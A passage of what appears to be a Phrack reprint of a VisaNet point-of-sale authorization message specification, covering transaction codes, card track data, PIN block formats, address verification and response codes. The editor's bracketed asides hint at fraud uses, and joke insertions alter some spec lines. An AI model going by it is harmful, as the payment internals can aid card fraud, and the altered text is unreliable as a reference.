4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
The following subsections will define the authorization request record data
elements.
4.01 RECORD FORMAT
There are several message formats defined within the VisaNet systems. The
second generation authorization format is specified by placing one of the
defined values in the record format field. Table 4.01 provides a brief summary
of the current formats.
TABLE 4.01
VisaNet Authorization Record Format Designators
RECORD FORMAT RECORD DESCRIPTION
--------------------------------------------------------------------------------
J All non-ATM card transactions (Visa cards, other credit
cards, private label credit cards and check guarantee)
G Visa supported ATM debit cards
4.02 APPLICATION TYPE
The VisaNet authorization system supports multiple application types ranging
from single thread first generation authorization to interleaved leased line
authorization processing. Table 4.02 provides a summary of application type.
TABLE 4.02
VisaNet Application Designators
APPLICATION USE WITH
TYPE APPLICATION DESCRIPTION REC. FMT.
--------------------------------------------------------------------------------
0 Single authorization per connection J and G
2 Multiple authorizations per connection J and G
single-threaded
4 Multiple authorizations per connect, J
interleaved
6 Reserved for future use ---
8 Reserved for future use ---
1,3,5,7 Reserved for VisaNet Central Data Capture (CDC) ---
9 Reserved for VisaNet Down Line Load ---
A-Z Reserved for future use ---
4.03 MESSAGE DELIMITER
The message delimiter separates the format and application type designators from
the body of the message. The message delimiter is defined as a "." (period)
4.04 ACQUIRER BIN
This field contains the Visa assigned six-digit Bank Identification Number (BIN)
The acquirer BIN identifies the merchant signing member that signed the merchant
using the terminal.
NOTE: The merchant receives this number from their signing member.
4.05 MERCHANT NUMBER
This field contains a NON-ZERO twelve digit number, assigned by the signing
member and/or the merchant, to identify the merchant within the member systems.
The combined Acquirer BIN and Merchant Number are required to identify the
merchant within the VisaNet systems.
4.06 STORE NUMBER
This field contains a NON-ZERO four-digit number assigned by the signing member
and/or the merchant to identify the merchant store within the member systems.
The combined Acquirer BIN, Merchant Number, and Store Number are required to
identify the store within the VisaNet systems.
4.07 TERMINAL NUMBER
This field contains a NON-ZERO four-digit number assigned by the signing member
and/or the merchant to identify the merchant store within the member systems.
This field can be used by systems which use controllers and/or concentrators to
identify the devices attached to the controllers and/or concentrators.
4.08 MERCHANT CATEGORY CODE
This field contains a four-digit number assigned by the signing member from a
list of category codes defined in the VisaNet Merchant Data Standards Handbook
to identify the merchant type.
4.09 MERCHANT COUNTRY CODE
This field contains a three-digit number assigned by the signing member from a
list of country codes defined in the VisaNet V.I.P. System Message Format
Manuals to identify the merchant location country.
4.10 MERCHANT CITY CODE
This field contains a five character code used to further identify the merchant
location. Within the United States, the give high order zip code digits of the
address of the store location are used. Outside of the United States, this
field will be assigned by the signing member.
4.11 TIME ZONE DIFFERENTIAL
This field contains a three-digit code used to calculate the local time within
the VisaNet authorization system. It is calculated by the signing member,
providing the local time zone differential from Greenwich Mean Time (GMT). The
first two digits specify the magnitude of the differential. Table 4.11 provides
a brief summary of the Time Zone Differential codes.
TABLE 4.11
Time Zone Differential Code Format
Byte # Length Format Contents
--------------------------------------------------------------------------------
1 1 NUMERIC DIRECTION
0 = Positive, Local Ahead of GMT,
offset in hours
1 = Negative, Local Time behind GMT,
offset in hours
2 = Positive, offset in 15 minute
increments
3 = Negative, offset in 15 minute
increments
4 = Positive, offset in 15 minute
increments, participating in
daylight savings time
5 = Negative, offset in 15 minute
increments, participating in
daylight savings time
6-9 = INVALID CODES
2-3 2 NUMERIC MAGNITUDE
For Byte #1 = 0 or 1
0 <= MAGNITUDE <= 12
For Byte #1 = 2 through 5
0 <= MAGNITUDE <= 48
--------------------------------------------------------------------------------
A code of 108 indicates the local Pacific Standard time which is 8 hours behind
GMT.
4.12 AUTHORIZATION TRANSACTION CODE
This field contains a two-character code defined by VisaNet and generated by the
terminal identifying the type of transaction for which the authorization is
requested. Table 4.12 provides a summary of the transaction codes.
TABLE 4.12
Authorization Transaction Codes
TRAN
CODE TRANSACTION DESCRIPTION
-------------------------------------------------------------------------------
54 Purchase
55 Cash Advance
56 Mail/Telephone Order
57 Quasi Cash
58 Card Authentication - Transaction Amt & Secondary Amt must equal
$0.00, AVS may be requested [ah-hah!]
64 Repeat: Purchase
65 Repeat: Cash Advance
66 Repeat: Mail/Telephone Order (MO/TO)
67 Repeat: Quasi Cash
68 Repeat: Card Authentication - Transaction Amt & Secondary Amt must
equal $0.00, AVS may be requested
70 Check guarantee, must include RIID (field 4.26)
81 Proprietary Card
84 Private Label Purchase
85 Private Label, Cash Advance
86 Private Label Mail/Telephone Order (MO/TO)
87 Private Label Quasi Cash
88 Private Label Card Authentication - Transaction Amt & Secondary Amt
must equal $0.00, AVS may be requested
93 Debit Purchase
94 Debit Return
95 Interlink Debit Cancel (see NOTE below)
--------------------------------------------------------------------------------
NOTE (for TRANSACTION CODE = 95)
--------------------------------
- For Interlink Debit CANCEL request message, all of the fields in
Groups I and II will come from the original transaction request or the
original transaction response, with the exception of the following:
- The AUTHORIZATION TRANSACTION CODE will need to be changed to the
Debit CANCEL code.
- The TRANSACTION SEQUENCE NUMBER should be incremented in the
normal fashion.
- The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE
(PIN) will need to be re-entered.
4.13 TERMINAL IDENTIFICATION NUMBER
This field contains an eight-digit code that must be greater than zero, defined
by the terminal down line load support organization. Support may be provided by
the Visa's Merchant Assistance Center (MAC), the signing member, or a third
party organization. The terminal ID is used to uniquely identify the terminal
in the terminal support system and identification for the VisaNet Central Data
Capture (CDC). The terminal ID may not be unique within the VisaNet system.
Each terminal support provider and member that provides its own terminal support
can assign potentially identical terminal IDs within its system. The terminal
ID can be used by the terminal down line load system to access the terminal
application and parameter data from a system data base when down line loading a
terminal. [huh?]
NOTE: It is recommended that [the] Terminal ID Number should be unique within
the same Acquirer's BIN.
4.14 PAYMENT SERVICE INDICATOR
This is a one-character field used to indicate a request for REPS qualification.
Table 4.14 provides a summary of the codes.
TABLE 4.14
Payment Service Indicator Codes
RECORD
FORMAT VALUE DESCRIPTION
------------------------------
J Y Yes
J N No
G Y Yes
G N No
------------------------------ [repetitive? you bet]
4.15 TRANSACTION SEQUENCE NUMBER
This field contains a four-digit code which is generated by the terminal as the
sequence number for the transaction. The sequence number is used by the
terminal to match request and response messages. This field is returned by
VisaNet without sequence verification. The sequence number is incremented with
wrap from 9999 to 0001.
4.16 CARDHOLDER IDENTIFICATION CODE
This one-character field contains a code that indicates the method used to
identify the cardholder. Table 4.16 provides a summary of the codes.
TABLE 4.16
Cardholder Identification Codes
ID CODE IDENTIFICATION METHOD
--------------------------------------------------------------------------------
A Personal Identification Number-23 byte static key (non-USA) fnord
B PIN at Automated Dispensing Machine - 32 byte static key
C Self Svc Limited Amount Terminal (No ID method available)
D Self-Service Terminal (No ID method available)
E Automated Gas Pump (No ID method available)
K Personal Identification Number - 32 byte DUK/PT
N Customer Address via Address Verification Service (AVS)
S Personal Identification Number - 32 byte static key
Z Cardholder Signature - Terminal has a PIN pad
@ Cardholder Signature - No PIN pad available
F-J,L,M,O-R Reserved for future use
T-Y
--------------------------------------------------------------------------------
4.17 ACCOUNT DATA SOURCE
This field contains a one-character code defined by Visa and generated by the
terminal to indicate the source of the customer data entered in field 4.18.
Table 4.17 provides a summary of codes
TABLE 4.17
Account Data Source Codes
ACCOUNT DATA
SOURCE CODE ACCOUNT DATA SOURCE CODE DESCRIPTION
--------------------------------------------------------------------------------
A RESERVED - Bar-code read
B RESERVED - OCR read
D Mag-stripe read, Track 2
H Mag-stripe read, Track 1
Q RESERVED - Manually keyed, bar-code capable terminal
R RESERVED - Manually keyed, OCR capable terminal
T Manually keyed, Track 2 capable
X Manually keyed, Track 1 capable
@ Manually keyed, terminal has no card reading capability
C,E-G,I-P,S, RESERVED for future use
U-W,Y-Z,0-9
--------------------------------------------------------------------------------
NOTE:
- If a dual track reading terminal is being used, be sure to enter the
correct value of "D" or "H" for the magnetic data that is transmitted
- When data is manually keyed at a dual track reading terminal, enter either
a "T" or an "X"
4.18 CUSTOMER DATA FIELD
This is a variable length field containing customer account or check acceptance
ID data in one of three formats. The cardholder account information can be read
d from the card or it may be entered manually. Additionally the terminal can be
used for check authorization processing with the check acceptance identification
number entered by the operator for transmission in this field.
NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
the following requirement must be available as an operating option if the
merchant location is found to be generating a disproportionately high percentage
of Suspect Transactions [lets get downright hostile about it] as defined in
chapter 9.10 of the VISA U.S.A. Operating Regulations. Specifically, chapter
9.10.B.2 requires that:
- The terminal must read the track data using a magnetic stripe reading
terminal
- The terminal must prompt the wage slave to manually enter the last four
digits of the account number
- The terminal must compare the keyed data with the last four digits of the
account number in the magnetic stripe
- If the compare is successful, the card is acceptable to continue in the
authorization process and the terminal must transmit the full, unaltered
contents of the magnetic stripe in the authorization message.
- If the compare fails, the card should not be honored at the Point of Sale
4.18.1 TRACK 1 READ DATA
This is a variable length field with a maximum data length of 76 characters.
The track 1 data read from the cardholder's card is checked for parity and LRC
errors and then converted from the six-bit characters encoded on the card to
seven-bit characters as defined in ANSI X3.4. The character set definitions are
provided in section 7 for reference. As part of the conversion the terminal
will strip off the starting sentinel, ending sentinel, and LRC characters. The
separators are to be converted to a "^" (HEX 5E) character. The entire
track must be provided in the request message. The character set and data
content are different between track 1 and track 2. The data read by a track 2
device can not be correctly reformatted and presented as though it were read by
a track 1 device. [aw shucks] The converted data can not be modified by adding
or deleting non-framing characters and must be a one-for-one representation of
the character read from the track.
4.18.2 TRACK 2 READ DATA
This is a variable length field with a maximum data length of 37 characters.
The track 2 data read from the cardholder's card is checked for parity and LRC
errors and then converted from the six-bit characters encoded on the card to
seven-bit characters as defined in ANSI X3.4. The character set definitions are
provided in section 7 for reference. As part of the conversion the terminal
will strip off the starting sentinel, ending sentinel, and LRC characters. The
separators are to be converted to a "^" (HEX 5E) character. The entire
track must be provided in the request message. The character set and data
content are different between track 2 and track 1. The data read by a track 1
device can not be correctly reformatted and presented as though it were read by
a track 2 device. The converted data can not be modified by adding or deleting
non-framing characters and must be a one-for-one representation of the character
read from the track. [repetitive? you bet]
4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
The customer credit card data may be key entered when the card can not be read,
when a card is not present, or when a card reader is not available.
4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
This is a variable length field consisting of 5 to 28 alphanumeric characters.
The embossed cardholder data, that is key entered, is validated by the terminal
using rules for each supported card type. For example, both Visa and Master
Card include a mod 10 check digit as the last digit of the Primary Account
Number. The Primary Account Number (PAN) is encoded as seven-bit characters
as defined in ANSI X3.4. The PAN is then provided in the manually entered
record format provided in Table 3.01b. The PAN must be provided without
embedded spaces.
4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
This four-digit field contains the card expiration date in the form MMYY (month-
month-year-year)
4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
The customer data may be card read or manually key entered for check acceptance
transactions.
4.18.4.1 CHECK ACCEPTANCE ID
This field is a variable length field consisting of 1 to 28 alphanumeric
characters. The check acceptance vendor will provide the data format and
validation rules to be used by the terminal. Typically the ID consists of a
two-digit state code and an ID which may be the customer's drivers license
number.
4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
This six-character field contains the customer birth date or a control code in
the form specified by the check acceptance processor.
4.19 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.20 CARDHOLDER IDENTIFICATION DATA
This field will be 0, 23, 29 or 32 characters in length. The cardholder ID
codes shown in Table 4.16 indicates the type of data in this field. Table
4.20 provides a brief summary of the current formats.
TABLE 4.20
Cardholder Identification Data Definitions
CARDHOLDER VALUE(S) FROM
ID LENGTH DESCRIPTION TABLE 4.16
--------------------------------------------------------------------------------
0 Signature ID used, No PIN pad is present @,C,D or E
0 Signature ID used on a terminal with a PIN pad Z
23 A PIN was entered on a STATIC key PIN pad A
32 A PIN was entered on a STATIC key PIN pad B
32 A PIN was entered on a DUK/PT key PIN pad K
32 A PIN was entered on a STATIC key PIN pad S
0 to 29 AVS was requested N
--------------------------------------------------------------------------------
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
NOTE: The 23 byte static key technology is NOT approved for use in terminals
deployed in the Visa U.S.A. region. [thanks nsa!]
When a PIN is entered on a PIN pad supporting 23 byte static key technology, the
terminal will generate the following data:
1JFxxyyaaaaaaaaaaaaaaaa
Where:
1J Header - PIN was entered
f Function Key Indicator - A single byte indicating which, if any,
function key was pressed on the PIN pad. This field is currently
not edited. Any printable character is allowed.
xx PIN Block Format - These two numeric bytes indicate the PIN
encryption method used to create the encrypted PIN block. Visa
currently supports four methods; 01, 02, 03, & 04. For more
information, please refer to the VisaNet Standards Manual, Card
Technology Standards, PIN and Security Standards, Section 2,
Chapter 3, PIN Block Formats
aaaaaaaaaaaaaaaa Expanded Encrypted PIN Block Data - The encrypted
PIN block format consists of 64 bits of data. Since the VisaNet
Second Generation protocol allows only printable characters in
data fields, these 64 bits must be expanded to ensure that no
values less than hex "20" are transmitted. To expand the 64 bit
encrypted PIN block, remove four bits at a time and convert them
to ANSI X3.4 characters using Table 4.20. After this conversion,
the 64 bit encrypted PIN block will consist of 16 characters that
will be placed in the Expanded Encrypted PIN Block Data field.
4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
When a PIN is entered on a PIN pad supporting 32 byte static key technology,
the terminal will generate the following data:
aaaaaaaaaaaaaaaa2001ppzz00000000
Where:
aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
PIN block format consists of 64 bits of data. Since the
VisaNet Second Generation protocol allows only printable
characters in data fields, these 64 bits must be expanded to
ensure that no values less than hex "20" are transmitted. To
expand the 64 bit encrypted PIN block, remove four bits at a
time and convert them to ANSI X3.4 characters using table 4.20.
After this conversion, the 64 bit encrypted PIN block will
consist of 16 characters that will be placed in the Expanded
Encrypted PIN Block Data field.
20 - Security Format Code - This code defines that the Zone
Encryption security technique was used.
01 - PIN Encryption Algorithm Identifier - This code defines that the
ANSI DES encryption technique was used.
pp - PIN Block Format Code - This code describes the PIN block format
was used by the acquirer. Values are:
01 - Format is based on the PIN, the PIN length, selected
rightmost digits of the account number and the pad
characters "0" and "F"; combined through an exclusive
"OR" operation.
02 - Format is based on the PIN, the PIN length and a user
specified numeric pad character.
03 - Format is based on the PIN and the "F" pad character.
04 - Format is the same as "01" except that the leftmost
account number digits are selected.
zz - Zone Key Index - This index points to the zone key used by the
acquirer to encrypt the PIN block. Values are:
01 - First key
02 - Second key
00000000 - Visa Reserved - Must be all zeros
For additional information, refer to the VisaNet manual V.I.P. System, Message
Formats, Section B: Field Descriptions. Specifically, fields 52 and 53;
Personal Identification Number (PIN) Data and Security Related Control
Information respectively.
4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
will generate the following 32 bytes:
aaaaaaaaaaaaaaaakkkkkkssssssssss
Where:
aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
PIN block format consists of 64 bits of data. Since the
VisaNet Second Generation protocol allows only printable
characters in data fields, these 64 bits must be expanded to
ensure that no values less than hex "20" are transmitted. To
expand the 64 bit encrypted PIN block, remove four bits at a
time and convert them to ANSI X3.4 characters using table 4.20.
After this conversion, the 64 bit encrypted PIN block will
consist of 16 characters that will be placed in the Expanded
Encrypted PIN Block Data field. [repetitive? you bet]
kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa
Visa assigned, six digit bank identification number.
ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded
Transaction Counter - Is represented by the concatenation of these
two hexadecimal fields. The PIN pad serial number is stored as
five hex digits minus one bit for a total of 19 bits of data. The
transaction counter is stored as five hex digits plus one bit for
a total of 21 bits of data. These two fields concatenated
together will contain 40 bits. Since the VisaNet Second
Generation protocol allows only printable characters in data
fields, these 40 bits must be expanded to ensure that no values
less than hex "20" are transmitted. To expand this 40 bit field,
remove four bits at a time and convert them to ASCII characters
using table 4.20. After this conversion, this 40 bit field will
consist of 10 characters that will be placed in the Expanded
TRSM ID & Expanded Transaction Counter Field.
TABLE 4.20
PIN Block conversion Table
HEXADECIMAL | ANSI X3.4
DATA | CHARACTER
--------------+----------------
0000 | 0
0001 | 1
0010 | 2
0011 | 3
0100 | 4
0101 | 5
0110 | 6
0111 | 7
1000 | 8
1001 | 9
1010 | A
1011 | B
1100 | C
1101 | D
1110 | E
1111 | F
-------------------------------
4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]
When Address Verification Service is requested, this field will contain the
mailing address of the cardholder's monthly statement. The format of this
field is:
<street address><apt no.><zip code>
or
<post office box number><zipcode>
Numbers are not spelled out. ("First Street" becomes "1ST Street", "Second"
becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP
code. For instance:
1391 ELM STREET 40404
is equivalent to: 1931ELMSTREET40404
P.O. Box 24356 55555
is not equivalent to P.O.BOX2435655555
If a field is not available or not applicable, it may be skipped. If nine
digits are available, the last five digits should always be used to pour more
sand into the wheels of progress.
4.21 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character. ==Phrack Magazine==
Volume Five, Issue Forty-Six, File 16 of 28
****************************************************************************
VisaNet Operations (Continued)
4.22 TRANSACTION AMOUNT
This is a variable field from three to twelve digits in length. The transaction
amount includes the amount in 4.28, Secondary Amount. Therefore, field 4.22
must be greater than or equal to field 4.28.
The transaction amount is presented by the terminal with an implied decimal
point. For example $.01 would be represented in the record as "001". When the
terminal is used with an authorization system which supports the US dollar as
the primary currency, the amount field must be limited to seven digits
(9999999). [...] The terminal may be used with authorization system which
support other currencies that require the full twelve-digit field.
4.23 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.24 DEVICE CODE/INDUSTRY CODE
This field is used to identify the device type which generated the transaction
and the industry type of the merchant. Table 4.24 provides a brief summary of
the current codes.
TABLE 4.24
Device Code/Industry Code
C C
O O
D D
E DEVICE TYPE E INDUSTRY TYPE
-------------------------------------------------------------------------------
0 Unknown or Unsure 0 Unknown or Unsure
1 RESERVED 1 RESERVED
2 RESERVED 2 RESERVED
3 RESERVED 3 RESERVED
4 RESERVED 4 RESERVED
5 RESERVED 5 RESERVED
6 RESERVED 6 RESERVED
7 RESERVED 7 RESERVED
8 RESERVED 8 RESERVED
9 RESERVED 9 RESERVED
A RESERVED A RESERVED
B RESERVED B Bank/Financial Institution
C P.C. C RESERVED
D Dial Terminal D RESERVED
E Electronic Cash Register (ECR) E RESERVED
F RESERVED F Food/Restaurant
G RESERVED G Grocery Store/Supermarket
H RESERVED H Hotel
I In-Store Processor I RESERVED
J RESERVED J RESERVED
K RESERVED K RESERVED
L RESERVED L RESERVED
M Main Frame M Mail Order
N RESERVED N RESERVED
O RESERVED O RESERVED
P POS-port P RESERVED
Q RESERVED for POS-port Q RESERVED
R RESERVED R Retail
S RESERVED S RESERVED
T RESERVED T RESERVED
U RESERVED U RESERVED
V RESERVED V RESERVED
W RESERVED W RESERVED
X RESERVED X RESERVED
Y RESERVED Y RESERVED
Z RESERVED Z RESERVED
--------------------------------------------------------------------------------
4.25 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
This six-digit field is provided by the merchant signing member and is present
when the terminal is used to process transactions which can not be routed using
the cardholder Primary Account Number. When a value is present in this field,
it is used as an RIID for all valid transaction codes, field 4.12, except 81
through 88. This field is used as an IIID for transaction codes 81 through 88.
Table 4.26 provides a summary of the RIID codes for check acceptance.
TABLE 4.26
Check Acceptance RIID Values
Vendor RIID
---------------------------
JBS, Inc 810000
Telecheck 861400
TeleCredit, West 894300 [note; telecredit has been
TeleCredit, East 894400 mutated/eaten by equifax]
---------------------------
4.27 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.28 SECONDARY AMOUNT (CASHBACK)
NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field,
see section 4.18, has been manually entered.
This is a variable length field from three to twelve digits in length. The
Secondary Amount is included in field 4.22, Transaction Amount.
The secondary amount is presented by the terminal with an implied decimal point.
For example $.01 would be represented in the record as "001". This field will
contain 000 when no secondary amount has been requested. Therefore, when the
terminal is used with an authorization system which supports the US dollar as
the primary currency, the secondary amount field must be limited to seven
digits (9999999). The terminal may be used with authorization systems which
support other currencies that require the full twelve-digit field.
4.29 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.30 MERCHANT NAME
This 25-character field contains the merchant name provided by the signing
member. the name must correspond to the name printed on the customer receipt.
The name is left justified with space fill. The first character position can
not be a space. This field must contain the same used in the data capture
batch.
4.32 MERCHANT STATE
This two-character field contains the merchant location state abbreviation
provided by the singing member. The abbreviation must correspond to the state
name printed on the customer receipt and be one of the Visa accepted
abbreviations. This field must contain the same data used in the data capture
batch.
4.33 SHARING GROUP
This one to fourteen-character field contains the group of debit card/network
types that a terminal may have access to and is provided by the singing member.
The values must correspond to one of the Visa assigned debit card /network
types. This data is part of the VisaNet debit data.
4.34 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.35 MERCHANT ABA NUMBER
This fixed length field is twelve digits in length. If this field is not used,
its length must be zero. If this field is not used, the following field must
also be empty.
This number identifies the merchant to a debit switch provided by the signing
member. The number is provided by the signing member.
4.36 MERCHANT SETTLEMENT AGENT NUMBER
This fixed length field is four digits in length. If this field is not used,
its length must be zero. If this field is not used, the previous field must
also be empty.
This number identifies the merchant settling agent. The number is provided by
the signing member.
4.37 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.38 AGENT NUMBER
This six-digit field contains an agent number assigned by the signing member.
The number identifies an institution which signs merchants as an agent of a
member. The member uses this number to identify the agent within the member
systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers
are required to uniquely identify a terminal within the VisaNet systems.
4.39 CHAIN NUMBER
This six-digit field contains a merchant chain identification number assigned
by the singing member. The member uses this number to identify the merchant
chain within the member systems. The acquirer BIN, Agent, Chain, Merchant,
Store, and Terminal numbers are required to uniquely identify a terminal within
the VisaNet systems.
4.40 BATCH NUMBER
This three-digit field contains a batch sequence number generated by the
terminal. The number will wrap from 999 to 001. This number is that data
capture batch number.
4.41 REIMBURSEMENT ATTRIBUTE
This is a single character fixed length field.
This field contains the reimbursement attribute assigned by the singing member.
This field must be a "space".
4.42 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
4.43 APPROVAL CODE
This contains a six-character fixed length field.
This field is only present in cancel transactions and contains the original
approval code from the original transaction.
The approval code was returned in the authorization response of the transaction
to be canceled.
4.44 SETTLEMENT DATE
This contains a four-digit fixed length field.
This field is only present in cancel transactions and contains the settlement
date from the original transaction and is in the format MMDD.
The settlement date was returned in the authorization response of the
transaction to be canceled.
4.45 LOCAL TRANSACTION DATE
This contains a four-digit fixed length field.
This field is only present in cancel transactions and contains the transaction
date from the original transaction and is in the format MMDD.
The transaction date was returned in the authorization response of the
transaction to be canceled as MMDDYY.
4.46 LOCAL TRANSACTION TIME
This contains a six-digit fixed length field.
This field is only present in cancel transactions and contains the transaction
time from the original transaction and is in the format HHMMSS.
The transaction time was returned in the authorization response of the
transaction to be canceled.
4.47 SYSTEM TRACE AUDIT NUMBER
This contains a six-character fixed length field.
This field is only present in cancel transactions and contains the trace audit
number from the original transaction.
The trace audit number was returned in the authorization response of the
transaction to be canceled.
4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
The field is a two-character fixed length field and must contain the original
AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled.
Currently, the only transaction that can be canceled in an Interlink Debit
Purchase.
4.49 NETWORK IDENTIFICATION CODE
This contains a single character fixed length field.
This field is only present in cancel transactions and contains the network ID
from the original transaction.
The network ID was returned in the authorization response of the transaction to
be canceled.
4.50 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
The following subsections will define the authorization response record data
elements.
5.01 PAYMENT SERVICE INDICATOR
This field contains the one-character payment service indicator. It must be
placed in the batch detail record for terminals that capture.
Table 5.01 provides a summary of current Values.
TABLE 5.01
Payment Service Indicator Values
VALUE DESCRIPTION
------------------------------------------------------------------
A REPS qualified
Y Requested a "Y" in field 4.14 and there was a problem
REPS denied (VAS edit error or BASE I reject)
N Requested an "N" in field 4.14 or requested a "Y" in field
4.14 and request was downgraded (by VAS)
space If "Y" sent and transaction not qualified (VAS downgrade)
-------------------------------------------------------------------
5.02 STORE NUMBER
This four-digit number is returned by VisaNet from the authorization request for
formats "J" and "G", and can be used to route the response within a store
controller and/or a store concentrator.
5.03 TERMINAL NUMBER
This four-digit number is returned by VisaNet from the authorization request for
formats "J" and "G", and can be used to route the response within a store
controller and/or a store concentrator.
5.04 AUTHORIZATION SOURCE CODE
This field contains a one-character code that indicates the source of the
authorization. The received code must be placed in the data capture detail
transaction record when data capture is enabled.
Table 5.04 provides a summary of current codes.
TABLE 5.04
Authorization Source Codes
Code Description
--------------------------------------------------------------------------------
1 STIP: time-out response
2 LCS: amount below issuer limit
3 STIP: issuer in Suppress-Inquiry mode
4 STIP: issuer unavailable
5 Issuer approval
6 Off-line approval, POS device generated
7 Acquirer approval: BASE I unavailable
8 Acquirer approval of a referral
9 Use for non-authorized transactions; such as credit card credits [yum!]
D Referral: authorization code manually keyed
E Off-line approval: authorization code manually keyed
--------------------------------------------------------------------------------
5.05 TRANSACTION SEQUENCE NUMBER
This field contains the four-digit code which was generated by the terminal as
the sequence number for the transaction and passed to the authorization center
in the authorization request record. The sequence number can be used by the
terminal to match request and response messages. The transaction sequence
number is returned by VisaNet without sequence verification.
5.06 RESPONSE CODE
This field contains a two-character response code indicating the status of the
authorization.
Table 5.06 provides the response codes for formats "J" and "G". A response code
of "00" represents an approval. A response code of "85" represents a successful
card verification returned by TRANSACTION CODES 58, 68, and 88. All other
response codes represent a non-approved request.
The value returned is stored in the batch transaction detail record for
terminals that capture.
TABLE 5.06
Authorization Response Codes For Record Formats "J" & "G"
Authorization Response AVS Result
Response Message Code Response Definition Code
--------------------------------------------------------------------------------
EXACT MATCH 00 Exact Match, 9 digit zip X
EXACT MATCH 00 Exact Match, 5 digit zip GRIND Y
ADDRESS MATCH 00 Address match only A
ZIP MATCH 00 9-digit zip match only W
ZIP MATCH 00 5-digit zip match only GRIND Z
NO MATCH 00 No address or zip match N
VER UNAVAILABLE 00 Address unavailable U
RETRY 00 Issuer system unavailable R
ERROR INELIGIBLE 00 Not a mail/phone order E
SERV UNAVAILABLE 00 Service not supported S
APPROVAL 00 Approved and completed see above
CARD OK 85 No reason to decline see above
CALL 01 Refer to issuer 0
CALL 02 Refer to issue - Special condition 0
NO REPLY 28 File is temporarily unavailable 0
NO REPLY 91 Issuer or switch is unavailable 0
HOLD-CALL 04 Pick up card 0
HOLD-CALL 07 Pick up card - Special condition 0
HOLD-CALL 41 Pick up card - Lost 0
HOLD-CALL 43 Pick up card - Stolen 0
ACCT LENGTH ERR EA Verification Error 0
ALREADY REVERSED 79 Already Reversed at Switch [ya got me] 0
AMOUNT ERROR 13 Invalid amount 0
CAN'T VERIFY PIN 83 Can not verify PIN 0
CARD NO ERROR 14 Invalid card number 0
CASHBACK NOT APP 82 Cashback amount not approved 0
CHECK DIGIT ERR EB Verification Error 0
CID FORMAT ERROR EC Verification Error 0
DATE ERROR 80 Invalid Date 0
DECLINE 05 Do not honor 0
DECLINE 51 Not Sufficient Funds 0
DECLINE 61 Exceeds Withdrawal Limit 0
DECLINE 65 Activity Limit Exceeded 0
ENCRYPTION ERROR 81 Cryptographic Error 0
ERROR xx 06 General Error 0
ERROR xxxx 06 General Error 0
EXPIRED CARD 54 Expired Card 0
INVALID ROUTING 98 Destination Not Found 0
INVALID TRANS 12 Invalid Transaction 0
NO CHECK ACCOUNT 52 No Check Account 0
NO SAVE ACCOUNT 54 No Save Account 0
NO SUCH ISSUER 15 No Such Issuer 0
RE ENTER 19 Re-enter Transaction 0
SEC VIOLATION 63 Security Violation 0
SERV NOT ALLOWED 57 Trans. not permitted-Card 0
SERV NOT ALLOWED 58 Trans. not permitted-Terminal 0
SERVICE CODE ERR 62 Restricted Card 0
SYSTEM ERROR 96 System Malfunction [whoop whoop!] 0
TERM ID ERROR 03 Invalid Merchant ID 0
WRONG PIN 55 Incorrect PIN 0
xxxxxxxxxxxxxxxxxx xx Undefined Response 0
--------------------------------------------------------------------------------
5.07 APPROVAL CODE
This field contains a six-character code when a transaction has been approved.
If the transaction is not approved the contents of the field should be ignored.
The approval code is input to the data capture detail transaction record.
5.08 LOCAL TRANSACTION DATE
This field contains a six-digit local date calculated (MMDDYY) by the
authorization center using the time zone differential code provided in the
authorization request message. This date is used by the terminal as the date to
be printed on the transaction receipts and audit reports, and as the date input
to the data capture transaction detail record. This field is only valid for
approved transactions.
5.09 AUTHORIZATION RESPONSE MESSAGE
This field is a sixteen-character field containing a response display message.
This message is used by the terminal to display the authorization results.
Table 5.06 provides the message summary. The messages are provided with "sp"
space fill. This field is mapped to the RESPONSE CODE, field 5.06, for all
non-AVS transactions and for all DECLINED AVS transactions. For APPROVED AVS
transactions (response code = "00" or "85"), it is mapped to the AVS RESULT
CODE, field 5.10.
5.10 AVS RESULT CODE
This one-character field contains the address verification result code. An
address verification result code is provided for transactions and provides an
additional indication that the card is being used by the person to which the
card was issued. The service is only available for mail/phone order
transactions.
Table 5.06 provides a summary of the AVS Result Codes.
An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined
transactions.
5.11 TRANSACTION IDENTIFIER
This numeric field will contain a transaction identifier. The identifier will
be fifteen-digits in length if the payment service indicator value is an "A" or
it will be zero in length if the payment service indicator value is not an "A".
This value is stored in the batch detail record for terminals that capture and
is mandatory for REPS qualification.
5.12 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
5.13 VALIDATION CODE
